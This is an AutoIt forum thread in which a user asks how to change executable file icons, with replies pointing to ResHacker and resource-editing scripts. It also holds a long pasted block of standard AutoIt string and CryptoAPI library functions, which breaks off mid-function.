system32 Posted February 9, 2012 Share Posted February 9, 2012 Hello to allI have tried a lot I did not find the solutionI am in the process of making change Any file icons for the files I did not find the appropriate codeCan you help me in thatGreetings to all Link to comment Share on other sites More sharing options...
Moderators Melba23 Posted February 9, 2012 Moderators Share Posted February 9, 2012 system32,Welcome to the AutoIt forum. Which icons do you want to change? If it is the icon shown in the GUI title bar then you need GUISetIcon - if the systray then TraySetIcon. If something else entirely please explain further. M23 Any of my own code posted anywhere on the forum is available for use by others without any restriction of any kind Open spoiler to see my UDFs: Spoiler ArrayMultiColSort ---- Sort arrays on multiple columnsChooseFileFolder ---- Single and multiple selections from specified path treeview listingDate_Time_Convert -- Easily convert date/time formats, including the language usedExtMsgBox --------- A highly customisable replacement for MsgBoxGUIExtender -------- Extend and retract multiple sections within a GUIGUIFrame ---------- Subdivide GUIs into many adjustable framesGUIListViewEx ------- Insert, delete, move, drag, sort, edit and colour ListView itemsGUITreeViewEx ------ Check/clear parent and child checkboxes in a TreeViewMarquee ----------- Scrolling tickertape GUIsNoFocusLines ------- Remove the dotted focus lines from buttons, sliders, radios and checkboxesNotify ------------- Small notifications on the edge of the displayScrollbars ----------Automatically sized scrollbars with a single commandStringSize ---------- Automatically size controls to fit textToast -------------- Small GUIs which pop out of the notification area Link to comment Share on other sites More sharing options...
system32 Posted February 9, 2012 Author Share Posted February 9, 2012 (edited) system32, Welcome to the AutoIt forum. Which icons do you want to change? If it is the icon shown in the GUI title bar then you need GUISetIcon - if the systray then TraySetIcon. If something else entirely please explain further. M23 Thank you for this wonderful welcome .. No, I want to work a program to change icons of files!! Like this, expandcollapse popup#cs ---------------------------------------------------------------------------- AutoIt Version: 3.3.6.1 Author: change file icon Script Function: By System32 #ce ---------------------------------------------------------------------------- #include <ButtonConstants.au3> #include <EditConstants.au3> #include <GUIConstantsEx.au3> #include <WindowsConstants.au3> #Region ### START Koda GUI section ### Form= $Form1 = GUICreate("change file icon", 332, 101, 192, 124) $Input =GUICtrlCreateInput("", 8, 8, 233, 21) $Button1 = GUICtrlCreateButton("Choose file", 248, 8, 67, 25) $Button2 = GUICtrlCreateButton("change icon", 8, 48, 99, 41) $Button3 = GUICtrlCreateButton("Exit", 224, 48, 99, 41) GUISetState(@SW_SHOW) #EndRegion ### END Koda GUI section ### While 1 $nMsg = GUIGetMsg() Switch $nMsg Case $GUI_EVENT_CLOSE Exit Case $Button1 $message = "Choose the file" $message1 = "Choose the ico" $var = FileOpenDialog($message, @DesktopDir & "","exe FILE (*.exe)", 1 ,"") If @error Then MsgBox(16,"change file icon","Erorr") Else If $var <> "" Then $g = GUICtrlSetData($Input, $var) Else EndIf EndIf Case $Button2 $var = FileOpenDialog($message1, @DesktopDir & "","ico FILE (*.ico)", 1 ,"") If @error Then MsgBox(16,"change file icon","Erorr") Else If $var <> "" Then ; What is the code to change the icon files in order to put it here Else EndIf EndIf Case $Button3 Exit EndSwitch WEnd Edited February 9, 2012 by system32 Link to comment Share on other sites More sharing options...
system32 Posted February 10, 2012 Author Share Posted February 10, 2012 plz help meeee !!!!! Link to comment Share on other sites More sharing options...
Moderators Melba23 Posted February 10, 2012 Moderators Share Posted February 10, 2012 (edited) system32,My apologies, I thought I had replied to you yesterday - obviously the ether swallowed it! If you want to change the icon of data files then you need to change the executable associated with it - this post shows you how you might do it. However, if you want to change the icon of an executable file then you need to amend the resource table of that file, which I do not believe you can do with simple AutoIt code. But you can do it with ResHacker. I hope that helps. M23Edit: Seems I was wrong - see below. Edited February 10, 2012 by Melba23 Amending advice Any of my own code posted anywhere on the forum is available for use by others without any restriction of any kind Open spoiler to see my UDFs: Spoiler ArrayMultiColSort ---- Sort arrays on multiple columnsChooseFileFolder ---- Single and multiple selections from specified path treeview listingDate_Time_Convert -- Easily convert date/time formats, including the language usedExtMsgBox --------- A highly customisable replacement for MsgBoxGUIExtender -------- Extend and retract multiple sections within a GUIGUIFrame ---------- Subdivide GUIs into many adjustable framesGUIListViewEx ------- Insert, delete, move, drag, sort, edit and colour ListView itemsGUITreeViewEx ------ Check/clear parent and child checkboxes in a TreeViewMarquee ----------- Scrolling tickertape GUIsNoFocusLines ------- Remove the dotted focus lines from buttons, sliders, radios and checkboxesNotify ------------- Small notifications on the edge of the displayScrollbars ----------Automatically sized scrollbars with a single commandStringSize ---------- Automatically size controls to fit textToast -------------- Small GUIs which pop out of the notification area Link to comment Share on other sites More sharing options...
Skitty Posted February 10, 2012 Share Posted February 10, 2012 (edited) plz help meeee !!!!! Like this? Icon Changer Concept.au3 Just a lot a copy pasta from trancexxs stuff. Although if it's an autoit exe that you want to change the icon resource of, I think the script stub will be deleted in the process, so you need to save it before changing the resource and then add it as a resource itself so it will always stay there if I remember correctly. Edit: this is a very dirty way of doing it and you are better off using reshacker as Melba23 mentioned, I also made a little function that will preserve the script if you're changing an icon from an autoit compiled script. Edited February 10, 2012 by THAT1ANONYMOUSEDUDE Link to comment Share on other sites More sharing options...
system32 Posted February 10, 2012 Author Share Posted February 10, 2012 Thank you all for help May Gath Source Code to change the program icon file, but I can not extract the code for icon change Can you help me in this Alsors extracted from the 1- expandcollapse popupGlobal Const $GUI_EVENT_CLOSE = -3 Global Const $GUI_EVENT_MINIMIZE = -4 Global Const $GUI_EVENT_RESTORE = -5 Global Const $GUI_EVENT_MAXIMIZE = -6 Global Const $GUI_EVENT_PRIMARYDOWN = -7 Global Const $GUI_EVENT_PRIMARYUP = -8 Global Const $GUI_EVENT_SECONDARYDOWN = -9 Global Const $GUI_EVENT_SECONDARYUP = -10 Global Const $GUI_EVENT_MOUSEMOVE = -11 Global Const $GUI_EVENT_RESIZED = -12 Global Const $GUI_EVENT_DROPPED = -13 Global Const $GUI_RUNDEFMSG = "GUI_RUNDEFMSG" Global Const $GUI_AVISTOP = 0 Global Const $GUI_AVISTART = 1 Global Const $GUI_AVICLOSE = 2 Global Const $GUI_CHECKED = 1 Global Const $GUI_INDETERMINATE = 2 Global Const $GUI_UNCHECKED = 4 Global Const $GUI_DROPACCEPTED = 8 Global Const $GUI_NODROPACCEPTED = 4096 Global Const $GUI_ACCEPTFILES = $GUI_DROPACCEPTED Global Const $GUI_SHOW = 16 Global Const $GUI_HIDE = 32 Global Const $GUI_ENABLE = 64 Global Const $GUI_DISABLE = 128 Global Const $GUI_FOCUS = 256 Global Const $GUI_NOFOCUS = 8192 Global Const $GUI_DEFBUTTON = 512 Global Const $GUI_EXPAND = 1024 Global Const $GUI_ONTOP = 2048 Global Const $GUI_FONTITALIC = 2 Global Const $GUI_FONTUNDER = 4 Global Const $GUI_FONTSTRIKE = 8 Global Const $GUI_DOCKAUTO = 1 Global Const $GUI_DOCKLEFT = 2 Global Const $GUI_DOCKRIGHT = 4 Global Const $GUI_DOCKHCENTER = 8 Global Const $GUI_DOCKTOP = 32 Global Const $GUI_DOCKBOTTOM = 64 Global Const $GUI_DOCKVCENTER = 128 Global Const $GUI_DOCKWIDTH = 256 Global Const $GUI_DOCKHEIGHT = 512 Global Const $GUI_DOCKSIZE = 768 Global Const $GUI_DOCKMENUBAR = 544 Global Const $GUI_DOCKSTATEBAR = 576 Global Const $GUI_DOCKALL = 802 Global Const $GUI_DOCKBORDERS = 102 Global Const $GUI_GR_CLOSE = 1 Global Const $GUI_GR_LINE = 2 Global Const $GUI_GR_BEZIER = 4 Global Const $GUI_GR_MOVE = 6 Global Const $GUI_GR_COLOR = 8 Global Const $GUI_GR_RECT = 10 Global Const $GUI_GR_ELLIPSE = 12 Global Const $GUI_GR_PIE = 14 Global Const $GUI_GR_DOT = 16 Global Const $GUI_GR_PIXEL = 18 Global Const $GUI_GR_HINT = 20 Global Const $GUI_GR_REFRESH = 22 Global Const $GUI_GR_PENSIZE = 24 Global Const $GUI_GR_NOBKCOLOR = -2 Global Const $GUI_BKCOLOR_DEFAULT = -1 Global Const $GUI_BKCOLOR_TRANSPARENT = -2 Global Const $GUI_BKCOLOR_LV_ALTERNATE = -33554432 Global Const $GUI_WS_EX_PARENTDRAG = 1048576 Func _HexToString($STRHEX) If StringLeft($STRHEX, 2) = "0x" Then Return BinaryToString($STRHEX) Return BinaryToString("0x" & $STRHEX) EndFunc Func _StringBetween($S_STRING, $S_START, $S_END, $V_CASE = -1) Local $S_CASE = "" If $V_CASE = Default Or $V_CASE = -1 Then $S_CASE = "(?i)" Local $S_PATTERN_ESCAPE = "(.|||*|?|+|(|)|{|}|[|]|^|$|)" $S_START = StringRegExpReplace($S_START, $S_PATTERN_ESCAPE, "$1") $S_END = StringRegExpReplace($S_END, $S_PATTERN_ESCAPE, "$1") If $S_START = "" Then $S_START = "A" If $S_END = "" Then $S_END = "z" Local $A_RET = StringRegExp($S_STRING, "(?s)" & $S_CASE & $S_START & "(.*?)" & $S_END, 3) If @error Then Return SetError(1, 0, 0) Return $A_RET EndFunc Func _StringEncrypt($I_ENCRYPT, $S_ENCRYPTTEXT, $S_ENCRYPTPASSWORD, $I_ENCRYPTLEVEL = 1) If $I_ENCRYPT <> 0 And $I_ENCRYPT <> 1 Then SetError(1, 0, "") ElseIf $S_ENCRYPTTEXT = "" Or $S_ENCRYPTPASSWORD = "" Then SetError(1, 0, "") Else If Number($I_ENCRYPTLEVEL) <= 0 Or Int($I_ENCRYPTLEVEL) <> $I_ENCRYPTLEVEL Then $I_ENCRYPTLEVEL = 1 Local $V_ENCRYPTMODIFIED Local $I_ENCRYPTCOUNTH Local $I_ENCRYPTCOUNTG Local $V_ENCRYPTSWAP Local $AV_ENCRYPTBOX[256][2] Local $I_ENCRYPTCOUNTA Local $I_ENCRYPTCOUNTB Local $I_ENCRYPTCOUNTC Local $I_ENCRYPTCOUNTD Local $I_ENCRYPTCOUNTE Local $V_ENCRYPTCIPHER Local $V_ENCRYPTCIPHERBY If $I_ENCRYPT = 1 Then For $I_ENCRYPTCOUNTF = 0 To $I_ENCRYPTLEVEL Step 1 $I_ENCRYPTCOUNTG = "" $I_ENCRYPTCOUNTH = "" $V_ENCRYPTMODIFIED = "" For $I_ENCRYPTCOUNTG = 1 To StringLen($S_ENCRYPTTEXT) If $I_ENCRYPTCOUNTH = StringLen($S_ENCRYPTPASSWORD) Then $I_ENCRYPTCOUNTH = 1 Else $I_ENCRYPTCOUNTH += 1 EndIf $V_ENCRYPTMODIFIED = $V_ENCRYPTMODIFIED & Chr(BitXOR(Asc(StringMid($S_ENCRYPTTEXT, $I_ENCRYPTCOUNTG, 1)), Asc(StringMid($S_ENCRYPTPASSWORD, $I_ENCRYPTCOUNTH, 1)), 255)) Next $S_ENCRYPTTEXT = $V_ENCRYPTMODIFIED $I_ENCRYPTCOUNTA = "" $I_ENCRYPTCOUNTB = 0 $I_ENCRYPTCOUNTC = "" $I_ENCRYPTCOUNTD = "" $I_ENCRYPTCOUNTE = "" $V_ENCRYPTCIPHERBY = "" $V_ENCRYPTCIPHER = "" $V_ENCRYPTSWAP = "" $AV_ENCRYPTBOX = "" Local $AV_ENCRYPTBOX[256][2] For $I_ENCRYPTCOUNTA = 0 To 255 $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][1] = Asc(StringMid($S_ENCRYPTPASSWORD, Mod($I_ENCRYPTCOUNTA, StringLen($S_ENCRYPTPASSWORD)) + 1, 1)) $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][0] = $I_ENCRYPTCOUNTA Next For $I_ENCRYPTCOUNTA = 0 To 255 $I_ENCRYPTCOUNTB = Mod(($I_ENCRYPTCOUNTB + $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][0] + $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][1]), 256) $V_ENCRYPTSWAP = $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][0] $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][0] = $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTB][0] $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTB][0] = $V_ENCRYPTSWAP Next For $I_ENCRYPTCOUNTA = 1 To StringLen($S_ENCRYPTTEXT) $I_ENCRYPTCOUNTC = Mod(($I_ENCRYPTCOUNTC + 1), 256) $I_ENCRYPTCOUNTD = Mod(($I_ENCRYPTCOUNTD + $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTC][0]), 256) $I_ENCRYPTCOUNTE = $AV_ENCRYPTBOX[Mod(($AV_ENCRYPTBOX[$I_ENCRYPTCOUNTC][0] + $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTD][0]), 256)][0] $V_ENCRYPTCIPHERBY = BitXOR(Asc(StringMid($S_ENCRYPTTEXT, $I_ENCRYPTCOUNTA, 1)), $I_ENCRYPTCOUNTE) $V_ENCRYPTCIPHER &= Hex($V_ENCRYPTCIPHERBY, 2) Next $S_ENCRYPTTEXT = $V_ENCRYPTCIPHER Next Else For $I_ENCRYPTCOUNTF = 0 To $I_ENCRYPTLEVEL Step 1 $I_ENCRYPTCOUNTB = 0 $I_ENCRYPTCOUNTC = "" $I_ENCRYPTCOUNTD = "" $I_ENCRYPTCOUNTE = "" $V_ENCRYPTCIPHERBY = "" $V_ENCRYPTCIPHER = "" $V_ENCRYPTSWAP = "" $AV_ENCRYPTBOX = "" Local $AV_ENCRYPTBOX[256][2] For $I_ENCRYPTCOUNTA = 0 To 255 $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][1] = Asc(StringMid($S_ENCRYPTPASSWORD, Mod($I_ENCRYPTCOUNTA, StringLen($S_ENCRYPTPASSWORD)) + 1, 1)) $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][0] = $I_ENCRYPTCOUNTA Next For $I_ENCRYPTCOUNTA = 0 To 255 $I_ENCRYPTCOUNTB = Mod(($I_ENCRYPTCOUNTB + $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][0] + $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][1]), 256) $V_ENCRYPTSWAP = $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][0] $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][0] = $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTB][0] $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTB][0] = $V_ENCRYPTSWAP Next For $I_ENCRYPTCOUNTA = 1 To StringLen($S_ENCRYPTTEXT) Step 2 $I_ENCRYPTCOUNTC = Mod(($I_ENCRYPTCOUNTC + 1), 256) $I_ENCRYPTCOUNTD = Mod(($I_ENCRYPTCOUNTD + $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTC][0]), 256) $I_ENCRYPTCOUNTE = $AV_ENCRYPTBOX[Mod(($AV_ENCRYPTBOX[$I_ENCRYPTCOUNTC][0] + $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTD][0]), 256)][0] $V_ENCRYPTCIPHERBY = BitXOR(Dec(StringMid($S_ENCRYPTTEXT, $I_ENCRYPTCOUNTA, 2)), $I_ENCRYPTCOUNTE) $V_ENCRYPTCIPHER = $V_ENCRYPTCIPHER & Chr($V_ENCRYPTCIPHERBY) Next $S_ENCRYPTTEXT = $V_ENCRYPTCIPHER $I_ENCRYPTCOUNTG = "" $I_ENCRYPTCOUNTH = "" $V_ENCRYPTMODIFIED = "" For $I_ENCRYPTCOUNTG = 1 To StringLen($S_ENCRYPTTEXT) If $I_ENCRYPTCOUNTH = StringLen($S_ENCRYPTPASSWORD) Then $I_ENCRYPTCOUNTH = 1 Else $I_ENCRYPTCOUNTH += 1 EndIf $V_ENCRYPTMODIFIED &= Chr(BitXOR(Asc(StringMid($S_ENCRYPTTEXT, $I_ENCRYPTCOUNTG, 1)), Asc(StringMid($S_ENCRYPTPASSWORD, $I_ENCRYPTCOUNTH, 1)), 255)) Next $S_ENCRYPTTEXT = $V_ENCRYPTMODIFIED Next EndIf Return $S_ENCRYPTTEXT EndIf EndFunc Func _STRINGEXPLODE($SSTRING, $SDELIMITER, $ILIMIT = 0) If $ILIMIT > 0 Then $SSTRING = StringReplace($SSTRING, $SDELIMITER, Chr(0), $ILIMIT) $SDELIMITER = Chr(0) ElseIf $ILIMIT < 0 Then Local $IINDEX = StringInStr($SSTRING, $SDELIMITER, 0, $ILIMIT) If $IINDEX Then $SSTRING = StringLeft($SSTRING, $IINDEX - 1) EndIf EndIf Return StringSplit($SSTRING, $SDELIMITER, 3) EndFunc Func _StringInsert($S_STRING, $S_INSERTSTRING, $I_POSITION) Local $I_LENGTH, $S_START, $S_END If $S_STRING = "" Or (Not IsString($S_STRING)) Then Return SetError(1, 0, $S_STRING) ElseIf $S_INSERTSTRING = "" Or (Not IsString($S_STRING)) Then Return SetError(2, 0, $S_STRING) Else $I_LENGTH = StringLen($S_STRING) If (Abs($I_POSITION) > $I_LENGTH) Or (Not IsInt($I_POSITION)) Then Return SetError(3, 0, $S_STRING) EndIf EndIf If $I_POSITION = 0 Then Return $S_INSERTSTRING & $S_STRING ElseIf $I_POSITION > 0 Then $S_START = StringLeft($S_STRING, $I_POSITION) $S_END = StringRight($S_STRING, $I_LENGTH - $I_POSITION) Return $S_START & $S_INSERTSTRING & $S_END ElseIf $I_POSITION < 0 Then $S_START = StringLeft($S_STRING, Abs($I_LENGTH + $I_POSITION)) $S_END = StringRight($S_STRING, Abs($I_POSITION)) Return $S_START & $S_INSERTSTRING & $S_END EndIf EndFunc Func _StringProper($S_STRING) Local $IX = 0 Local $CAPNEXT = 1 Local $S_NSTR = "" Local $S_CURCHAR For $IX = 1 To StringLen($S_STRING) $S_CURCHAR = StringMid($S_STRING, $IX, 1) Select Case $CAPNEXT = 1 If StringRegExp($S_CURCHAR, "[a-zA-Zغپ-غ’ع‘إ“â€چع؛]") Then $S_CURCHAR = StringUpper($S_CURCHAR) $CAPNEXT = 0 EndIf Case Not StringRegExp($S_CURCHAR, "[a-zA-Zغپ-غ’ع‘إ“â€چع؛]") $CAPNEXT = 1 Case Else $S_CURCHAR = StringLower($S_CURCHAR) EndSelect $S_NSTR &= $S_CURCHAR Next Return $S_NSTR EndFunc Func _StringRepeat($SSTRING, $IREPEATCOUNT) Local $SRESULT Select Case Not StringIsInt($IREPEATCOUNT) SetError(1) Return "" Case StringLen($SSTRING) < 1 SetError(1) Return "" Case $IREPEATCOUNT <= 0 SetError(1) Return "" Case Else For $ICOUNT = 1 To $IREPEATCOUNT $SRESULT &= $SSTRING Next Return $SRESULT EndSelect EndFunc Func _StringReverse($S_STRING) Local $I_LEN = StringLen($S_STRING) If $I_LEN < 1 Then Return SetError(1, 0, "") Local $T_CHARS = DllStructCreate("char[" & $I_LEN + 1 & "]") DllStructSetData($T_CHARS, 1, $S_STRING) Local $A_REV = DllCall("msvcrt.dll", "ptr:cdecl", "_strrev", "ptr", DllStructGetPtr($T_CHARS)) If @error Or $A_REV[0] = 0 Then Return SetError(2, 0, "") Return DllStructGetData($T_CHARS, 1) EndFunc Func _StringToHex($STRCHAR) Return Hex(StringToBinary($STRCHAR)) EndFunc Global Const $PROV_RSA_FULL = 1 Global Const $PROV_RSA_AES = 24 Global Const $CRYPT_VERIFYCONTEXT = -268435456 Global Const $HP_HASHSIZE = 4 Global Const $HP_HASHVAL = 2 Global Const $CRYPT_EXPORTABLE = 1 Global Const $CRYPT_USERDATA = 1 Global Const $CALG_MD2 = 32769 Global Const $CALG_MD4 = 32770 Global Const $CALG_MD5 = 32771 Global Const $CALG_SHA1 = 32772 Global Const $CALG_3DES = 26115 Global Const $CALG_AES_128 = 26126 Global Const $CALG_AES_192 = 26127 Global Const $CALG_AES_256 = 26128 Global Const $CALG_DES = 26113 Global Const $CALG_RC2 = 26114 Global Const $CALG_RC4 = 26625 Global Const $CALG_USERKEY = 0 Global $__G_ACRYPTINTERNALDATA[3] Func _CRYPT_STARTUP() If __CRYPT_REFCOUNT() = 0 Then Local $HADVAPI32 = DllOpen("Advapi32.dll") If @error Then Return SetError(1, 0, False) __CRYPT_DLLHANDLESET($HADVAPI32) Local $ARET Local $IPROVIDERID = $PROV_RSA_AES If @OSVersion = "WIN_2000" Then $IPROVIDERID = $PROV_RSA_FULL $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptAcquireContext", "handle*", 0, "ptr", 0, "ptr", 0, "dword", $IPROVIDERID, "dword", $CRYPT_VERIFYCONTEXT) If @error Or Not $ARET[0] Then DllClose(__CRYPT_DLLHANDLE()) Return SetError(2, 0, False) Else __CRYPT_CONTEXTSET($ARET[1]) EndIf EndIf __CRYPT_REFCOUNTINC() Return True EndFunc Func _CRYPT_SHUTDOWN() __CRYPT_REFCOUNTDEC() If __CRYPT_REFCOUNT() = 0 Then DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptReleaseContext", "handle", __CRYPT_CONTEXT(), "dword", 0) DllClose(__CRYPT_DLLHANDLE()) EndIf EndFunc Func _CRYPT_DERIVEKEY($VPASSWORD, $IALG_ID, $IHASH_ALG_ID = $CALG_MD5) Local $ARET Local $HCRYPTHASH Local $HBUFF Local $IERROR Local $VRETURN _CRYPT_STARTUP() Do $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptCreateHash", "handle", __CRYPT_CONTEXT(), "uint", $IHASH_ALG_ID, "ptr", 0, "dword", 0, "handle*", 0) If @error Or Not $ARET[0] Then $IERROR = 1 $VRETURN = -1 ExitLoop EndIf $HCRYPTHASH = $ARET[5] $HBUFF = DllStructCreate("byte[" & BinaryLen($VPASSWORD) & "]") DllStructSetData($HBUFF, 1, $VPASSWORD) $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptHashData", "handle", $HCRYPTHASH, "ptr", DllStructGetPtr($HBUFF), "dword", DllStructGetSize($HBUFF), "dword", $CRYPT_USERDATA) If @error Or Not $ARET[0] Then $IERROR = 2 $VRETURN = -1 ExitLoop EndIf $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptDeriveKey", "handle", __CRYPT_CONTEXT(), "uint", $IALG_ID, "handle", $HCRYPTHASH, "dword", $CRYPT_EXPORTABLE, "handle*", 0) If @error Or Not $ARET[0] Then $IERROR = 3 $VRETURN = -1 ExitLoop EndIf $IERROR = 0 $VRETURN = $ARET[5] Until True If $HCRYPTHASH <> 0 Then DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptDestroyHash", "handle", $HCRYPTHASH) Return SetError($IERROR, 0, $VRETURN) EndFunc Func _CRYPT_DESTROYKEY($HCRYPTKEY) Local $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptDestroyKey", "handle", $HCRYPTKEY) Local $NERROR = @error _CRYPT_SHUTDOWN() If $NERROR Or Not $ARET[0] Then Return SetError(1, 0, False) Else Return SetError(0, 0, True) EndIf EndFunc Func _CRYPT_ENCRYPTDATA($VDATA, $VCRYPTKEY, $IALG_ID, $FFINAL = True) Local $HBUFF Local $IERROR Local $VRETURN Local $REQBUFFSIZE Local $ARET _CRYPT_STARTUP() Do If $IALG_ID <> $CALG_USERKEY Then $VCRYPTKEY = _CRYPT_DERIVEKEY($VCRYPTKEY, $IALG_ID) If @error Then $IERROR = 1 $VRETURN = -1 ExitLoop EndIf EndIf $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptEncrypt", "ptr", $VCRYPTKEY, "ptr", 0, "bool", 1, "dword", 0, "ptr", 0, "dword*", BinaryLen($VDATA), "dword", 0) If @error Or Not $ARET[0] Then $IERROR = 2 $VRETURN = -1 ExitLoop EndIf $REQBUFFSIZE = $ARET[6] $HBUFF = DllStructCreate("byte[" & $REQBUFFSIZE & "]") DllStructSetData($HBUFF, 1, $VDATA) $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptEncrypt", "ptr", $VCRYPTKEY, "ptr", 0, "bool", $FFINAL, "dword", 0, "ptr", DllStructGetPtr($HBUFF), "dword*", BinaryLen($VDATA), "dword", DllStructGetSize($HBUFF)) If @error Or Not $ARET[0] Then $IERROR = 3 $VRETURN = -1 ExitLoop EndIf $IERROR = 0 $VRETURN = DllStructGetData($HBUFF, 1) Until True If $IALG_ID <> $CALG_USERKEY Then _CRYPT_DESTROYKEY($VCRYPTKEY) _CRYPT_SHUTDOWN() Return SetError($IERROR, 0, $VRETURN) EndFunc Func _CRYPT_DECRYPTDATA($VDATA, $VCRYPTKEY, $IALG_ID, $FFINAL = True) Local $HBUFF Local $IERROR Local $VRETURN Local $HTEMPSTRUCT Local $IPLAINTEXTSIZE Local $ARET _CRYPT_STARTUP() Do If $IALG_ID <> $CALG_USERKEY Then $VCRYPTKEY = _CRYPT_DERIVEKEY($VCRYPTKEY, $IALG_ID) If @error Then $IERROR = 1 $VRETURN = -1 ExitLoop EndIf EndIf $HBUFF = DllStructCreate("byte[" & BinaryLen($VDATA) + 1000 & "]") DllStructSetData($HBUFF, 1, $VDATA) $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptDecrypt", "handle", $VCRYPTKEY, "handle", 0, "bool", $FFINAL, "dword", 0, "ptr", DllStructGetPtr($HBUFF), "dword*", BinaryLen($VDATA)) If @error Or Not $ARET[0] Then $IERROR = 2 $VRETURN = -1 ExitLoop EndIf $IPLAINTEXTSIZE = $ARET[6] $HTEMPSTRUCT = DllStructCreate("byte[" & $IPLAINTEXTSIZE & "]", DllStructGetPtr($HBUFF)) $IERROR = 0 $VRETURN = DllStructGetData($HTEMPSTRUCT, 1) Until True If $IALG_ID <> $CALG_USERKEY Then _CRYPT_DESTROYKEY($VCRYPTKEY) _CRYPT_SHUTDOWN() Return SetError($IERROR, 0, $VRETURN) EndFunc Func _CRYPT_HASHDATA($VDATA, $IALG_ID, $FFINAL = True, $HCRYPTHASH = 0) Local $IERROR Local $VRETURN = 0 Local $IHASHSIZE Local $ARET Local $HBUFF = 0 _CRYPT_STARTUP() Do If $HCRYPTHASH = 0 Then $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptCreateHash", "handle", __CRYPT_CONTEXT(), "uint", $IALG_ID, "ptr", 0, "dword", 0, "handle*", 0) If @error Or Not $ARET[0] Then $IERROR = 1 $VRETURN = -1 ExitLoop EndIf $HCRYPTHASH = $ARET[5] EndIf $HBUFF = DllStructCreate("byte[" & BinaryLen($VDATA) & "]") DllStructSetData($HBUFF, 1, $VDATA) $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptHashData", "handle", $HCRYPTHASH, "ptr", DllStructGetPtr($HBUFF), "dword", DllStructGetSize($HBUFF), "dword", $CRYPT_USERDATA) If @error Or Not $ARET[0] Then $IERROR = 2 $VRETURN = -1 ExitLoop EndIf If $FFINAL Then $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptGetHashParam", "handle", $HCRYPTHASH, "dword", $HP_HASHSIZE, "dword*", 0, "dword*", 4, "dword", 0) If @error Or Not $ARET[0] Then $IERROR = 3 $VRETURN = -1 ExitLoop EndIf $IHASHSIZE = $ARET[3] $HBUFF = DllStructCreate("byte[" & $IHASHSIZE & "]") $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptGetHashParam", "handle", $HCRYPTHASH, "dword", $HP_HASHVAL, "ptr", DllStructGetPtr($HBUFF), "dword*", DllStructGetSize($HBUFF), "dword", 0) If @error Or Not $ARET[0] Then $IERROR = 4 $VRETURN = -1 ExitLoop EndIf $IERROR = 0 $VRETURN = DllStructGetData($HBUFF, 1) Else $VRETURN = $HCRYPTHASH EndIf Until True If $HCRYPTHASH <> 0 And $FFINAL Then DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptDestroyHash", "handle", $HCRYPTHASH) _CRYPT_SHUTDOWN() Return SetError($IERROR, 0, $VRETURN) EndFunc Func _CRYPT_HASHFILE($SFILE, $IALG_ID) Local $HFILE Local $IERROR, $VRETURN Local $HHASHOBJECT = 0 Local $BTEMPDATA _CRYPT_STARTUP() Do $HFILE = FileOpen($SFILE, 16) If $HFILE = -1 Then $IERROR = 1 $VRETURN = -1 ExitLoop EndIf Do $BTEMPDATA = FileRead($HFILE, 512 * 1024) If @error Then $VRETURN = _CRYPT_HASHDATA($BTEMPDATA, $IALG_ID, True, $HHASHOBJECT) If @error Then $VRETURN = -1 $IERROR = 2 ExitLoop 2 EndIf ExitLoop 2 Else $HHASHOBJECT = _CRYPT_HASHDATA($BTEMPDATA, $IALG_ID, False, $HHASHOBJECT) If @error Then $VRETURN = -1 $IERROR = 3 ExitLoop 2 EndIf EndIf Until False Until True _CRYPT_SHUTDOWN() If $HFILE <> -1 Then FileClose($HFILE) Return SetError($IERROR, 0, $VRETURN) EndFunc Func _CRYPT_ENCRYPTFILE($SSOURCEFILE, $SDESTINATIONFILE, $VCRYPTKEY, $IALG_ID) Local $HINFILE, $HOUTFILE Local $IERROR = 0, $VRETURN = True Local $BTEMPDATA Local $IFILESIZE = FileGetSize($SSOURCEFILE) Local $IREAD = 0 _CRYPT_STARTUP() Do If $IALG_ID <> $CALG_USERKEY Then $VCRYPTKEY = _CRYPT_DERIVEKEY($VCRYPTKEY, $IALG_ID) If @error Then $IERROR = 1 $VRETURN = -1 ExitLoop EndIf EndIf $HINFILE = FileOpen($SSOURCEFILE, 16) If @error Then $IERROR = 2 $VRETURN = -1 ExitLoop EndIf $HOUTFILE = FileOpen($SDESTINATIONFILE, 26) If @error Then $IERROR = 3 $VRETURN = -1 ExitLoop EndIf Do $BTEMPDATA = FileRead($HINFILE, 1024 * 1024) $IREAD += BinaryLen($BTEMPDATA) If $IREAD = $IFILESIZE Then $BTEMPDATA = _CRYPT_ENCRYPTDATA($BTEMPDATA, $VCRYPTKEY, $CALG_USERKEY, True) If @error Then $IERROR = 4 $VRETURN = -1 EndIf FileWrite($HOUTFILE, $BTEMPDATA) ExitLoop 2 Else $BTEMPDATA = _CRYPT_ENCRYPTDATA($BTEMPDATA, $VCRYPTKEY, $CALG_USERKEY, False) If @error 